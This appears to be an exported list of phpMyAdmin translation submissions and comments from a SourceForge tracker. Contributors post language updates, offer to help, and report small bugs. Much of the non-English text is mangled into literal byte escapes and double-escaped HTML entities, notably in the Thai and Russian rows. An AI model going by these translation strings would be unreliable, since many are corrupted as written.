o is a constraint of oppure translatable to or also ) And a more IMPORTANT thing 235 PRIMARY has to remain PRIMARY PRIMARIO is a legal column name in MySQL.
Attached, the modified file.
Cc to danone aruba.it original translator) Happy to contribute to make phpMyAdmin even better as it is!
Original URL https sourceforge.net p phpmyadmin translations 94 https sourceforge.net p phpmyadmin translations 94 Original author dphantom","bug"
"24444","3126","some minor corrections pt translation 3. some minor corrections pt translation 3 Original URL https sourceforge.net p phpmyadmin translations 95 https sourceforge.net p phpmyadmin translations 95 Original author lopopizarro","bug"
"24444","3127","Arabic Translation file.
Haaaaaa !!!
The arabic Translation file is attached with this message Original URL https sourceforge.net p phpmyadmin translations 96 https sourceforge.net p phpmyadmin translations 96 Original author kallida","bug"
"24444","3128","2.2.6) Dump data confusion.
Hi, at least in German Version 2.2.6, when I dump only Data from a Table and say from Row 100 to 200, it dumps all 200 Rows!
KA Hamburg Original URL https sourceforge.net p phpmyadmin translations 97 https sourceforge.net p phpmyadmin translations 97 Original author anonymous","bug"
"24444","3129","italian.
italian updated Original URL https sourceforge.net p phpmyadmin translations 98 https sourceforge.net p phpmyadmin translations 98 Original author danone","bug"
"24444","3130","Croatian win1250 translation.
Croatian win1250 translation Original URL https sourceforge.net p phpmyadmin translations 99 https sourceforge.net p phpmyadmin translations 99 Original author sdtech","bug"
"24444","3131","Croatian iso 8859 2 translation.
Croatian iso8859 2 translation Original URL https sourceforge.net p phpmyadmin translations 100 https sourceforge.net p phpmyadmin translations 100 Original author sdtech","bug"
"24444","3132","portuguese translation.
new lines translated Original URL https sourceforge.net p phpmyadmin translations 101 https sourceforge.net p phpmyadmin translations 101 Original author lopopizarro","bug"
"24444","3133","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 102 https sourceforge.net p phpmyadmin translations 102 Original author danone","bug"
"24444","3134","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 103 https sourceforge.net p phpmyadmin translations 103 Original author danone","bug"
"24444","3135","vietnamese offer.
if you want vietnamese translator Original URL https sourceforge.net p phpmyadmin translations 104 https sourceforge.net p phpmyadmin translations 104 Original author anonymous","bug"
"24444","3136","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 105 https sourceforge.net p phpmyadmin translations 105 Original author danone","bug"
"24444","3137","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 106 https sourceforge.net p phpmyadmin translations 106 Original author danone","bug"
"24444","3138","chinese BIG5 and GB translation update.
thx Original URL https sourceforge.net p phpmyadmin translations 107 https sourceforge.net p phpmyadmin translations 107 Original author siusun","bug"
"24444","3139","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 108 https sourceforge.net p phpmyadmin translations 108 Original author danone","bug"
"24444","3140","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 109 https sourceforge.net p phpmyadmin translations 109 Original author danone","bug"
"24444","3141","chinese BIG5 and GB translation update.
the transaction may not be accurate because cannot actually try the function.
so this is the beta translation.
will correct it when have new cvs package if i translate wrong.
Original URL https sourceforge.net p phpmyadmin translations 110 https sourceforge.net p phpmyadmin translations 110 Original author siusun","bug"
"24444","3142","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 111 https sourceforge.net p phpmyadmin translations 111 Original author danone","bug"
"24444","3143","Portuguese Translation Update.
Update to some strings in the portuguese trasnlation the most obvious ones ) strOptions = Opxd1x83xd1x88es ; strStructure = Estrutura ; strDumpXRows = Exporta s registos comexd1x83ando em s. ; Antxd0xb7nio Raposo Original URL https sourceforge.net p phpmyadmin translations 112 https sourceforge.net p phpmyadmin translations 112 Original author cfmsoft","bug"
"24444","3144","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 113 https sourceforge.net p phpmyadmin translations 113 Original author danone","bug"
"24444","3145","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 114 https sourceforge.net p phpmyadmin translations 114 Original author danone","bug"
"24444","3146","Estonian language update.
New translations and some old fixes Original URL https sourceforge.net p phpmyadmin translations 115 https sourceforge.net p phpmyadmin translations 115 Original author finsoft","bug"
"24444","3147","Czech translation.
Hi here is updated Czech translation I hope I removed all messages for patch 539183, if not please warn me ; )) Michal Cihar Original URL https sourceforge.net p phpmyadmin translations 116 https sourceforge.net p phpmyadmin translations 116 Original author nijel","bug"
"24444","3148","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 117 https sourceforge.net p phpmyadmin translations 117 Original author danone","bug"
"24444","3149","Georgian Translation offer.
I am able to help you with the translation to Georgian translation of phpmyadmin and phpmyadmin.net) I am available from now on.
Kind Regards, Zurabi Jgamadze zurabi iae.nl Original URL https sourceforge.net p phpmyadmin translations 118 https sourceforge.net p phpmyadmin translations 118 Original author anonymous","bug"
"24444","3150","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 119 https sourceforge.net p phpmyadmin translations 119 Original author danone","bug"
"24444","3151","Polish update.... Polish update.
Original URL https sourceforge.net p phpmyadmin translations 120 https sourceforge.net p phpmyadmin translations 120 Original author ubanus","bug"
"24444","3152","chinese BIG5 and GB translation update.
just translated and 1 suggestion... add the menu bar in the amp;quot;Browse amp;quot;, amp;quot;Insert amp;quot; and some other screen eg amp;quot;Result amp;quot; section.. thx.
Original URL https sourceforge.net p phpmyadmin translations 121 https sourceforge.net p phpmyadmin translations 121 Original author siusun","bug"
"24444","3153","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 122 https sourceforge.net p phpmyadmin translations 122 Original author danone","bug"
"24444","3154","Norwegian translation for the v2.3.0rc.
Here is the norwegian translation of the new strings for the 2.3.0rc1 version.
Might be a little rough around the edges, but will clean up when tested with new version.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 123 https sourceforge.net p phpmyadmin translations 123 Original author sven erik","bug"
"24444","3155","Polish updated.
fixed an mistake Original URL https sourceforge.net p phpmyadmin translations 124 https sourceforge.net p phpmyadmin translations 124 Original author ubanus","bug"
"24444","3156","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 125 https sourceforge.net p phpmyadmin translations 125 Original author danone","bug"
"24444","3157","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 126 https sourceforge.net p phpmyadmin translations 126 Original author danone","bug"
"24444","3158","Updated norwegian translation.
Updated norwegian translation with the strConfigFileError and strNotSet strings.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 127 https sourceforge.net p phpmyadmin translations 127 Original author sven erik","bug"
"24444","3159","Swedish translation.
Here is the Swedish translation of all new messages.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 128 https sourceforge.net p phpmyadmin translations 128 Original author bth","bug"
"24444","3160","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 129 https sourceforge.net p phpmyadmin translations 129 Original author danone","bug"
"24444","3161","Georgian Unicode Translation.
I have translated phpMyAdmin on Georgian Unicode international the standard.
Original URL https sourceforge.net p phpmyadmin translations 130 https sourceforge.net p phpmyadmin translations 130 Original author anonymous","bug"
"24444","3162","New Finnish translations.
strLinksTo = Linkitys sarakkeeseen ; strExport = Tulosta tiedostoksi ruudulle ; strOperations = Toiminnot ; strExportToXML = Rakenne ja data XML muodossa ; strOptions = Lis amp;amp;auml;valinnat ; strStructure = Rakenne ; strRelationView = Relaation amp;amp;auml;kym amp;amp;auml; ; strDumpXRows = Tee vedos s rivist amp;amp;auml;, alkaen rivist amp;amp;auml; s. ; strSQL = SQL ; strLinkNotFound = Linkki amp;amp;auml; ei l amp;amp;ouml;ydy ; strConfigureTableCoord = M amp;amp;auml; amp;amp;auml;rittele koordinaatit taululle s ; strScaleFactorSmall = Kaavio ei mahdu yhdelle sivulle t amp;amp; auml;ll amp;amp;auml; skaalauksella ; strDisplayPDF = N amp;amp;auml;yt amp;amp;auml; PDF kaavio ; strPageNumber = Sivunnumero ; strShowGrid = N amp;amp;auml;yt amp;amp;auml; ruudukko ; strShowColor = N amp;amp;auml;yt amp;amp;auml; v amp;amp;auml;rit ; strShowTableDimension = N amp;amp;auml;yt amp;amp;auml; taulujen ulottuvuus ; strPdfInvalidPageNum = PDF n sivunumeroa ei ole m amp;amp;auml; amp;amp; auml;ritelty!
; strPdfInvalidTblName = Taulua amp;quot; s amp;quot; ei l amp;amp;ouml;ydy!
; strChangeDisplay = Valitse n amp;amp;auml;ytett amp;amp;auml;v amp;amp;auml; sarake ; strNumSearchResultsInTable = s hakutulosta taulussa amp;lt;i amp;gt; s amp;lt; i amp;gt; ; strNumSearchResultsTotal = amp;lt;b amp;gt;Yhteens amp;amp;auml; amp;lt; b amp;gt; amp;lt;i amp;gt; s amp;lt; i amp;gt; hakutulosta ; strSearch = Hae ; strSearchFormTitle = Hae tietokannassa ; strSearchInTables = Tauluista ; strSearchNeedle = Haettavat sanat tai arvot merkki amp;amp;auml; voi k amp;amp;auml;ytt amp;amp;auml; amp;amp;auml; jokerimerkkin amp;amp;auml;) ; strSearchOption1 = v amp;amp;auml;hint amp;amp;auml; amp;amp;auml;n yksi sanoista ; strSearchOption2 = kaikki sanat ; strSearchOption3 = koko lause ; strSearchOption4 = regexp haku ; strSearchResultsFor = Tulokset hakusanalla amp;quot; amp;lt;i amp;gt; s amp;lt; i amp;gt; amp;quot; s ; strSearchType = Hae ; strSplitWordsWithSpace = Sanat erotellaan v amp;amp;auml;lily amp;amp; ouml;nnill amp;amp;auml;.
; strStructPropose = Ehdota taulun rakennetta ; strExplain = Kerro SQL lauseesta EXPLAIN) ; strPhp = N amp;amp;auml;yt amp;amp;auml; PHP koodi ; strNoPhp = Piilota PHP koodi ; strPdfDbSchema = Kaavio tietokannasta amp;quot; s amp;quot; Sivu s ; strGenBy = Generoinut ; strSQLResult = SQL lauseen tulos ; strEditPDFPages = Muokkaa PDF sivuja ; strNoDescription = ei selityst amp;amp;auml; ; strChoosePage = Valitse muokattava sivu ; strCreatePage = Luo uusi sivu ; strSelectTables = Valitse taulut ; strConfigFileError = phpMyAdmin ei pysty lukemaan asetustiedostoa.
amp;lt;br amp;gt;T amp;amp;auml;m amp;amp;auml; saattaa johtua virheest amp;amp; auml;, jonka PHP l amp;amp;ouml;ysi tiedostosta tai tiedoston puuttumisesta.
amp;lt;br amp;gt;Voit avata tiedoston allaolevasta linkist amp;amp;auml; ja lukea mahdolliset PHP virheilmoituikset.
Todenn amp;amp;auml;k amp;amp; ouml;isimmin joltain rivilt amp;amp;auml; puuttuu lainausmerkki tai puolipiste.
amp;lt;br amp;gt;Jos linkist amp;amp;auml; avautuva sivu on tyhj amp;amp;auml;, asetustiedostosta ei l amp;amp;ouml;ytynyt virhett amp;amp;auml;.
; strNotSet = amp;lt;b amp;gt; s amp;lt; b amp;gt; taulua ei l amp;amp;ouml;ytynyt tai sit amp;amp;auml; ei ole m amp;amp;auml; amp;amp;auml;ritelty s tiedostossa ; strMissingBracket = Hakasulku puuttuu ; strHaveToShow = Valitse vxd7x94hintxd7x94xd7x94n yksi sarake ; strCantLoadRecodeIconv = Merkist amp;amp;ouml;n konvertointiin tarvittavaa iconv tai recode laajennusta ei voitu ladata.
Muokkaa PHP n asetuksia ja salli n amp;amp;auml;iden laajennusten k amp;amp;auml;ytt amp;amp; ouml; tai muuta phpMyAdminin asetuksia niin ettei konvertointia suoriteta.
; strCantUseRecodeIconv = iconv , libiconv tai recode string funktioita ei voitu k amp;amp;auml;ytt amp;amp;auml; amp;amp;auml;.
Tarkista PHP n asetukset.
; strMySQLCharset = MySQL n k amp;amp;auml;ytt amp;amp;auml;m amp;amp;auml; merkist amp;amp;ouml; ; Original URL https sourceforge.net p phpmyadmin translations 131 https sourceforge.net p phpmyadmin translations 131 Original author visa","bug"
"24444","3163","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 132 https sourceforge.net p phpmyadmin translations 132 Original author danone","bug"
"24444","3164","Estonian language update.
New translations and some fixes Original URL https sourceforge.net p phpmyadmin translations 133 https sourceforge.net p phpmyadmin translations 133 Original author finsoft","bug"
"24444","3165","Czech translation.
One more update for Czech Michal Original URL https sourceforge.net p phpmyadmin translations 134 https sourceforge.net p phpmyadmin translations 134 Original author nijel","bug"
"24444","3166","Norwegian translation for v2.3.0RC1.
strMissingBracket = Manglende parantes ; strHaveToShow = Du mxc4xba velge minst en kolonne for visning ; strCantLoadRecodeIconv = Kan ikke laste iconv eller recode modulen som trengs for tegnsett konvertering, konfigurer php slik at disse kan lastes eller slxc4xba av tegnsett konvertering i phpMyAdmin.
; strCantUseRecodeIconv = Kan ikke bruke hverken iconv, libiconv og recode string funktsjonene selv om modulene sier de er lastet.
Sjekk din php konfigurasjon.
; strMySQLCharset = MySQL tegnsett ; strComments = Kommentarer ; Have a great summer everyone!
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 135 https sourceforge.net p phpmyadmin translations 135 Original author sven erik","bug"
"24444","3167","Updated Greek Translation.
Hey guys, I downloaded 2.3.0 rc1 earlier today and translated all the new strings.
I also updated some of the old ones that didn t seem correct.
I don t know if I m done or not with the updating of the old strings, but I m submitting this now since I feel it s ok.
I haven t moved the strings to their sections as I didn t know if that would help you or not.
I left them there so that they re separated from the old strings and easily distinguishable.
Best regards, Kyriakos Original URL https sourceforge.net p phpmyadmin translations 136 https sourceforge.net p phpmyadmin translations 136 Original author theremon","bug"
"24444","3168","2.3.0 rc1) Textual Improvement?.
Hi Guys, Nice work on 2.3.0 rc1.
May I suggest the following textual improvement on the search screen?
Change from Words are splitted by a space character Change to Words are separated by a space character Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin translations 137 https sourceforge.net p phpmyadmin translations 137 Original author ndarlow","bug"
"24444","3169","Translation to Portuguese upgrade.
Translation to Portuguese upgrade Original URL https sourceforge.net p phpmyadmin translations 138 https sourceforge.net p phpmyadmin translations 138 Original author lopopizarro","bug"
"24444","3170","Polish update.
Fixed some typos.
Original URL https sourceforge.net p phpmyadmin translations 139 https sourceforge.net p phpmyadmin translations 139 Original author ubanus","bug"
"24444","3171","Translation to Portuguese upgrade II.
Translation to Portuguese upgrade II Original URL https sourceforge.net p phpmyadmin translations 140 https sourceforge.net p phpmyadmin translations 140 Original author lopopizarro","bug"
"24444","3172","chinese BIG5 and GB translation update.
updatet the missing one string and make some little change on old wrong translate Original URL https sourceforge.net p phpmyadmin translations 141 https sourceforge.net p phpmyadmin translations 141 Original author siusun","bug"
"24444","3173","Translation to Portuguese upgrade III.
Translation to Portuguese upgrade III Original URL https sourceforge.net p phpmyadmin translations 142 https sourceforge.net p phpmyadmin translations 142 Original author lopopizarro","bug"
"24444","3174","italian utf 8. italian utf 8 translation Original URL https sourceforge.net p phpmyadmin translations 143 https sourceforge.net p phpmyadmin translations 143 Original author danone","bug"
"24444","3175","Czech update.
This patch chages QBEdescription to shorter like it was done in english.
Michal Original URL https sourceforge.net p phpmyadmin translations 144 https sourceforge.net p phpmyadmin translations 144 Original author nijel","bug"
"24444","3176","italian.
updates utf8 Original URL https sourceforge.net p phpmyadmin translations 145 https sourceforge.net p phpmyadmin translations 145 Original author danone","bug"
"24444","3177","chinese BIG5 and GB translation update.
chinese utf8 Original URL https sourceforge.net p phpmyadmin translations 146 https sourceforge.net p phpmyadmin translations 146 Original author siusun","bug"
"24444","3178","albanian.
albanian Original URL https sourceforge.net p phpmyadmin translations 147 https sourceforge.net p phpmyadmin translations 147 Original author anonymous","bug"
"24444","3179","albanian.
albanian Original URL https sourceforge.net p phpmyadmin translations 148 https sourceforge.net p phpmyadmin translations 148 Original author laurenti","bug"
"24444","3180","Czech.
updated czech translations Original URL https sourceforge.net p phpmyadmin translations 149 https sourceforge.net p phpmyadmin translations 149 Original author nijel","bug"
"24444","3181","Thai translation for 2 new strings.
TIS 620 encoded) strRelationNotWorking = xe0xb8x84xe0xb8xa7xe0xb8xb2xe0xb8xa1xe0xb8xaaxe0xb8xb2xe0xb8xa1xe0xb8xb2xe0xb8xa3xe0xb8x96xe0xb9x80xe0xb8x9exe0xb8xb4xe0xb9x88xe0xb8xa1xe0xb9x80xe0xb8x95xe0xb8xb4xe0xb8xa1xe0xb8x97xe0xb8xb5xe0xb9x88xe0xb8xadxe0xb8x99xe0xb8xb8xe0xb8x8dxe0xb8xb2xe0xb8x95xe0xb9x83xe0xb8xabxe0xb9x89xe0xb9x83xe0xb8x8axe0xb9x89xe0xb8x87xe0xb8xb2xe0xb8x99 linked Tables xe0xb9x84xe0xb8x94xe0xb9x89 xe0xb9x84xe0xb8x94xe0xb9x89xe0xb8x96xe0xb8xb9xe0xb8x81xe0xb8xa3xe0xb8xb0xe0xb8x87xe0xb8xb1xe0xb8x9axe0xb9x80xe0xb8xadxe0xb8xb2xe0xb9x84xe0xb8xa7xe0xb9x89 xe0xb8x94xe0xb9x89xe0xb8xa7xe0xb8xa2xe0xb9x80xe0xb8xabxe0xb8x95xe0xb8xb8xe0xb8x9cxe0xb8xa5xe0xb8x95xe0xb8xb2xe0xb8xa1xe0xb8x97xe0xb8xb5xe0xb9x88xe0xb9x81xe0xb8x88xe0xb9x89xe0xb8x87xe0xb9x84xe0xb8xa7xe0xb9x89xe0xb9x83xe0xb8x99 shere s ; strAllTableSameWidth = xe0xb9x83xe0xb8xabxe0xb9x89xe0xb9x81xe0xb8xaaxe0xb8x94xe0xb8x87xe0xb8x95xe0xb8xb2xe0xb8xa3xe0xb8xb2xe0xb8x87xe0xb8x97xe0xb8xb8xe0xb8x81xe0xb8x95xe0xb8xb2xe0xb8xa3xe0xb8xb2xe0xb8x87xe0xb8x94xe0xb9x89xe0xb8xa7xe0xb8xa2xe0xb8x84xe0xb8xa7xe0xb8xb2xe0xb8xa1xe0xb8x81xe0xb8xa7xe0xb9x89xe0xb8xb2xe0xb8x87xe0xb9x80xe0xb8x97xe0xb9x88xe0xb8xb2xe0xb8x81xe0xb8xb1xe0xb8x99xe0xb8xabxe0xb8xa3xe0xb8xb7xe0xb8xadxe0xb9x84xe0xb8xa1xe0xb9x88?
; regards, bact Original URL https sourceforge.net p phpmyadmin translations 150 https sourceforge.net p phpmyadmin translations 150 Original author bacteria","bug"
"24444","3182","Norwegian translation for 2 new strings.
strRelationNotWorking = Tilleggsfunksjonene for xc4xba kunne jobbe med koblede tabeller er deaktivert.
For xc4xba finne ut hvorfor, klikk sher s. ; strAllTableSameWidth = vis alle tabeller med samme bredde?
; Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 151 https sourceforge.net p phpmyadmin translations 151 Original author sven erik","bug"
"24444","3183","Slovenian translation.
Slovenian translation of phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin translations 152 https sourceforge.net p phpmyadmin translations 152 Original author bobex","bug"
"24444","3184","Slovene translation.
Slovene translation in UTF 8, iso 8859 2 and win 1250 codepages Original URL https sourceforge.net p phpmyadmin translations 153 https sourceforge.net p phpmyadmin translations 153 Original author urosh","bug"
"24444","3185","Russian win 1251) translation.
strLinksTo = xd0xa1xd0xb2xd1x8fxd0xb7xd1x8c xd1x81 ; to translate strExport = xd0xadxd0xbaxd1x81xd0xbfxd0xbexd1x80xd1x82 ; to translate strOperations = xd0x9exd0xbfxd0xb5xd1x80xd0xb0xd1x86xd0xb8xd0xb8 ; to translate strExportToXML = xd0xadxd0xbaxd1x81xd0xbfxd0xbexd1x80xd1x82 xd0xb2 XML xd1x84xd0xbexd1x80xd0xbcxd0xb0xd1x82 ; to translate strOptions = xd0x9exd0xbfxd1x86xd0xb8xd0xb8 ; to translate strStructure = xd0xa1xd1x82xd1x80xd1x83xd0xbaxd1x82xd1x83xd1x80xd0xb0 ; to translate strRelationView = xd0xa1xd0xb2xd1x8fxd0xb7xd0xb0xd0xbdxd0xbdxd1x8bxd0xb9 xd0xb2xd0xb8xd0xb4 ; to translate strDumpXRows = xd0x94xd0xb0xd0xbcxd0xbf s xd0xb7xd0xb0xd0xbfxd0xb8xd1x81xd0xb5xd0xb9, xd0xbdxd0xb0xd1x87xd0xb8xd0xbdxd0xb0xd1x8f xd1x81 s. ; to translate strSQL = SQL ; to translate strLinkNotFound = xd0xa1xd0xb2xd1x8fxd0xb7xd1x8c xd0xbdxd0xb5 xd0xbdxd0xb0xd0xb9xd0xb4xd0xb5xd0xbdxd0xb0 ; to translate strConfigureTableCoord = xd0x98xd0xb7xd0xbcxd0xb5xd0xbdxd0xb8xd1x82xd0xb5 xd0xbaxd0xbexd0xbexd1x80xd0xb4xd0xb8xd0xbdxd0xb0xd1x82xd1x8b xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd1x8b s ; to translate strScaleFactorSmall = xd0x9cxd0xb0xd1x81xd1x88xd1x82xd0xb0xd0xb1 xd1x81xd0xbbxd0xb8xd1x88xd0xbaxd0xbexd0xbc xd0xbcxd0xb0xd0xbbxd0xb5xd0xbdxd1x8cxd0xbaxd0xb8xd0xb9 xd0xb4xd0xbbxd1x8f xd0xbexd1x82xd0xbexd0xb1xd1x80xd0xb0xd0xb6xd0xb5xd0xbdxd0xb8xd1x8f xd0xb2xd1x81xd0xb5xd0xb9 xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd1x8b xd0xbdxd0xb0 xd0xbexd0xb4xd0xbdxd0xbexd0xb9 xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd0xb5 ; to translate strDisplayPDF = xd0x9fxd0xbexd0xbaxd0xb0xd0xb7xd0xb0xd1x82xd1x8c PDF xd1x81xd1x85xd0xb5xd0xbcxd1x83 ; to translate strPageNumber = xd0x9dxd0xbexd0xbcxd0xb5xd1x80 xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd1x8b ; to translate strShowGrid = xd0x9fxd0xbexd0xbaxd0xb0xd0xb7xd0xb0xd1x82xd1x8c xd1x81xd0xb5xd1x82xd0xbaxd1x83 ; to translate strShowColor = xd0x9fxd0xbexd0xbaxd0xb0xd0xb7xd0xb0xd1x82xd1x8c xd1x86xd0xb2xd0xb5xd1x82 ; to translate strShowTableDimension = xd0x9fxd0xbexd0xbaxd0xb0xd0xb7xd0xb0xd1x82xd1x8c xd1x80xd0xb0xd0xb7xd0xbcxd0xb5xd1x80xd0xbdxd0xbexd1x81xd1x82xd1x8c xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd1x8b ; to translate strPdfInvalidPageNum = xd0x9dxd0xb5xd0xbexd0xbfxd1x80xd0xb5xd0xb4xd0xb5xd0xbbxd0xb5xd0xbdxd0xbdxd1x8bxd0xb9 xd0xbdxd0xbexd0xbcxd0xb5xd1x80 PDF xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd1x8b!
; to translate strPdfInvalidTblName = xd0xa2xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd0xb0 amp;quot; s amp;quot; xd0xbdxd0xb5 xd1x81xd1x83xd1x89xd0xb5xd1x81xd1x82xd0xb2xd1x83xd0xb5xd1x82!
; to translate strChangeDisplay = xd0x92xd1x8bxd0xb1xd0xb5xd1x80xd0xb8xd1x82xd0xb5 xd0xbfxd0xbexd0xbbxd0xb5 xd0xb4xd0xbbxd1x8f xd0xbexd1x82xd0xbexd0xb1xd1x80xd0xb0xd0xb6xd0xb5xd0xbdxd0xb8xd1x8f ; to translate strNumSearchResultsInTable = s xd0xb7xd0xb0xd0xbfxd0xb8xd1x81xd0xb8 xd0xb5xd0xb9) xd0xb2 xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd0xb5 amp;lt;i amp;gt; s amp;lt; i amp;gt; ; to translate strNumSearchResultsTotal = amp;lt;b amp;gt;xd0x98xd1x82xd0xbexd0xb3xd0xbe amp;lt; b amp;gt; amp;lt;i amp;gt; s amp;lt; i amp;gt; xd0xb7xd0xb0xd0xbfxd0xb8xd1x81xd0xb8 xd0xb5xd0xb9) ; to translate strSearch = xd0x98xd1x81xd0xbaxd0xb0xd1x82xd1x8c ; to translate strSearchFormTitle = xd0x98xd1x81xd0xbaxd0xb0xd1x82xd1x8c xd0xb2 xd0xb1xd0xb0xd0xb7xd0xb5 xd0xb4xd0xb0xd0xbdxd0xbdxd1x8bxd1x85 ; to translate strSearchInTables = xd0x92 xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd0xb5 xd0xb0xd1x85) ; to translate strSearchNeedle = xd0xa1xd0xbbxd0xbexd0xb2xd0xbe xd0xb0) xd0xb8xd0xbbxd0xb8 xd0xb7xd0xbdxd0xb0xd1x87xd0xb5xd0xbdxd0xb8xd0xb5 xd1x8f) xd0xb4xd0xbbxd1x8f xd0xbfxd0xbexd0xb8xd1x81xd0xbaxd0xb0 xd0xb2xd0xbaxd0xbbxd1x8exd1x87xd0xb0xd1x8f amp;quot; amp;quot;) xd0xb2 ; to translate strSearchOption1 = xd1x85xd0xbexd1x82xd1x8c xd0xbexd0xb4xd0xbdxd0xbe xd1x81xd0xbbxd0xbexd0xb2xd0xbe ; to translate strSearchOption2 = xd0xb2xd1x81xd0xb5 xd1x81xd0xbbxd0xbexd0xb2xd0xb0 ; to translate strSearchOption3 = xd1x82xd0xbexd1x87xd0xbdxd0xbexd0xb5 xd1x81xd0xbexd0xbexd1x82xd0xb2xd0xb5xd1x82xd1x81xd1x82xd0xb2xd0xb8xd0xb5 ; to translate strSearchOption4 = xd1x80xd0xb5xd0xb3xd1x83xd0xbbxd1x8fxd1x80xd0xbdxd0xbexd0xb5 xd0xb2xd1x8bxd1x80xd0xb0xd0xb6xd0xb5xd0xbdxd0xb8xd0xb5 ; to translate strSearchResultsFor = xd0x98xd1x81xd0xbaxd0xb0xd1x82xd1x8c xd0xb2 amp;quot; amp;lt;i amp;gt; s amp;lt; i amp;gt; amp;quot; s ; to translate strSearchType = xd0x98xd1x81xd0xbaxd0xb0xd1x82xd1x8c ; to translate strSplitWordsWithSpace = xd0xa1xd0xbbxd0xbexd0xb2xd0xb0, xd1x80xd0xb0xd0xb7xd0xb4xd0xb5xd0xbbxd0xb5xd0xbdxd0xbdxd1x8bxd0xb5 xd0xbfxd1x80xd0xbexd0xb1xd0xb5xd0xbbxd0xbexd0xbc amp;quot; amp;quot;).
; to translate strStructPropose = xd0x9fxd1x80xd0xb5xd0xb4xd0xbbxd0xb0xd0xb3xd0xb0xd0xb5xd0xbcxd0xb0xd1x8f xd1x81xd1x82xd1x80xd1x83xd0xbaxd1x82xd1x83xd1x80xd0xb0 xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd1x8b procedure analyse) ; to translate strExplain = xd0xadxd1x84xd1x84xd0xb5xd0xbaxd1x82xd0xb8xd0xb2xd0xbdxd0xbexd1x81xd1x82xd1x8c SQL xd0xb7xd0xb0xd0xbfxd1x80xd0xbexd1x81xd0xb0 ; to translate strPhp = xd0xa1xd0xbexd0xb7xd0xb4xd0xb0xd1x82xd1x8c PHP xd0xbaxd0xbexd0xb4 ; to translate strNoPhp = xd0xb1xd0xb5xd0xb7 PHP xd0xbaxd0xbexd0xb4xd0xb0 ; to translate strPdfDbSchema = xd0xa1xd1x82xd1x80xd1x83xd0xbaxd1x82xd1x83xd1x80xd0xb0 xd0xb1xd0xb0xd0xb7xd1x8b amp;quot; s amp;quot; xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd0xb0 s ; to translate strGenBy = xd0xa1xd0xbexd0xb7xd0xb4xd0xb0xd0xbdxd0xbdxd1x8bxd0xb9 ; to translate strSQLResult = SQL xd1x80xd0xb5xd0xb7xd1x83xd0xbbxd1x8cxd1x82xd0xb0xd1x82 ; to translate strEditPDFPages = xd0x98xd0xb7xd0xbcxd0xb5xd0xbdxd0xb8xd1x82xd1x8c PDF xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd1x8b ; to translate strNoDescription = xd0xbdxd0xb5xd1x82 xd0xbexd0xbfxd0xb8xd1x81xd0xb0xd0xbdxd0xb8xd1x8f ; to translate strChoosePage = xd0x92xd1x8bxd0xb1xd0xb5xd1x80xd0xb8xd1x82xd0xb5 xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd1x83 xd0xb4xd0xbbxd1x8f xd1x80xd0xb5xd0xb4xd0xb0xd0xbaxd1x82xd0xb8xd1x80xd0xbexd0xb2xd0xb0xd0xbdxd0xb8xd1x8f ; to translate strCreatePage = xd0xa1xd0xbexd0xb7xd0xb4xd0xb0xd1x82xd1x8c xd0xbdxd0xbexd0xb2xd1x83xd1x8e xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd1x83 ; to translate strSelectTables = xd0x92xd1x8bxd0xb1xd0xb5xd1x80xd0xb8xd1x82xd0xb5 xd1x82xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd1x83 xd1x8b) ; to translate strConfigFileError = phpMyAdmin xd0xbdxd0xb5 xd0xbcxd0xbexd0xb6xd0xb5xd1x82 xd0xbfxd1x80xd0xbexd1x87xd0xb8xd1x82xd0xb0xd1x82xd1x8c xd0xb4xd0xb0xd0xbdxd0xbdxd1x8bxd0xb5 xd0xb8xd0xb7 xd0xbaxd0xbexd0xbdxd1x84xd0xb8xd0xb3xd0xb0xd1x80xd0xb0xd1x86xd0xb8xd0xbexd0xbdxd0xbdxd0xbexd0xb3xd0xbe xd1x84xd0xb0xd0xb9xd0xbbxd0xb0!
amp;lt;br amp;gt;xd0x92xd0xbexd0xb7xd0xbcxd0xbexd0xb6xd0xbdxd0xb0xd1x8f xd0xbfxd1x80xd0xb8xd1x87xd0xb8xd0xbdxd0xb0 xd1x81xd0xb8xd0xbdxd1x82xd0xb0xd0xbaxd1x81xd0xb8xd1x87xd0xb5xd1x81xd0xbaxd0xb0xd1x8f xd0xbexd1x88xd0xb8xd0xb1xd0xbaxd0xb0.
